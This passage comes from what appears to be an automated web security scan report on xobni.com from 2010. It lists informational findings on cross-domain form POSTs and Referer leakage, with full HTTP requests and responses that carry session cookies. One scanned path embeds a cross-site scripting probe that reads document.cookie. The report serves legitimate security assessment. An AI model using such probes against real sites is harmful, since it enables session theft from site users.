   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">Über Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">Überblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerklärung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ©2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/learnmore/mobile/trial?lc=en'>English</a><a href='/learnmore/mobile/trial?lc=de'>Deutsch</a><a href='/learnmore/mobile/trial?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return false;" id=
...[SNIP]...

10. Cross-domain POST
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


10.1. http://www.xobni.com/enterprise/sign_up

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/sign_up

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /enterprise/sign_up HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<div class="wForm wFormdefaultWidth">
                   <form method="post" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" id="id2388121" class="labelsLeftAligned hintsSide">
                   <input type=hidden name="oid" value="00D80000000c5tu">
...[SNIP]...

10.2. http://www.xobni.com/partners/partners_signup.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /partners/partners_signup.php

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /partners/partners_signup.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<div id="leafcontent" style="position:relative;">
           <form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="POST">
           <input type="hidden" name="type" value="enterprise">
...[SNIP]...

11. Cross-domain Referer leakage
There are 18 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


11.1. http://www.xobni.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19983

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</h3>
       
       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

11.2. http://www.xobni.com/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /about/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /about/?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni, the Outloo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<p>Xobni has raised two rounds of funding from leading investors including: <a href="http://www.khoslaventures.com/">Khosla Ventures</a>, <a href="http://www.firstround.com/">First Round Capital</a>, <a href="http://www.cisco.com/">Cisco</a>, <a href="http://www.blackberrypartnersfund.com/">BlackBerry Partners Fund</a>, <a href="http://www.atomicoinvestments.com">Atomico Investments</a>
...[SNIP]...

11.3. http://www.xobni.com/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /account/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /account/?action=forgot HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<link rel='stylesheet' href='/csscache/1265760498/styles/account.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.4. http://www.xobni.com/developer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /developer/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /developer/?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Developer Z
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://code.google.com/apis/gmail/gadgets/contextual/" target="_blank">Gmail Contextual Gadgets Developer's Guide</a>
...[SNIP]...
<li><a href="http://wiki.opensocial.org/index.php?title=JavaScript_API_Reference" target="_blank">JavaScript API Reference from opensocial.org</a>
...[SNIP]...
<li><a href="http://code.google.com/apis/gadgets/docs/dev_guide.html" target="_blank">Google Gadget Developer's Guide from Google Code</a>
...[SNIP]...

11.5. http://www.xobni.com/download

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /download?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</div>
<img src="https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=1844822&TYPE=330908&CURRENCY=USD&METHOD=IMG" height="1" width="20"></div>
...[SNIP]...

11.6. http://www.xobni.com/download

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /download?lc=de HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</div>
<img src="https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=3146091&TYPE=330908&CURRENCY=USD&METHOD=IMG" height="1" width="20"></div>
...[SNIP]...

11.7. http://www.xobni.com/download

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /download?lc=fr HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</div>
<img src="https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=2330073&TYPE=330908&CURRENCY=USD&METHOD=IMG" height="1" width="20"></div>
...[SNIP]...

11.8. http://www.xobni.com/enterprise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /enterprise?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.9. http://www.xobni.com/errors/404.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /errors/404.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /errors/404.php?report_my_error=1&source=&asked=test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7913

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.10. http://www.xobni.com/learnmore/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/video

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /learnmore/video?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Video Gal
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.11. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8012

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.12. http://www.xobni.com/partners

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /partners

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /partners?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10553

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.13. http://www.xobni.com/press/testimonials

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/testimonials

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /press/testimonials?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Testimonial
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</style>
           <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

11.14. http://www.xobni.com/products

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /products

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /products?lc=de HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9287

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
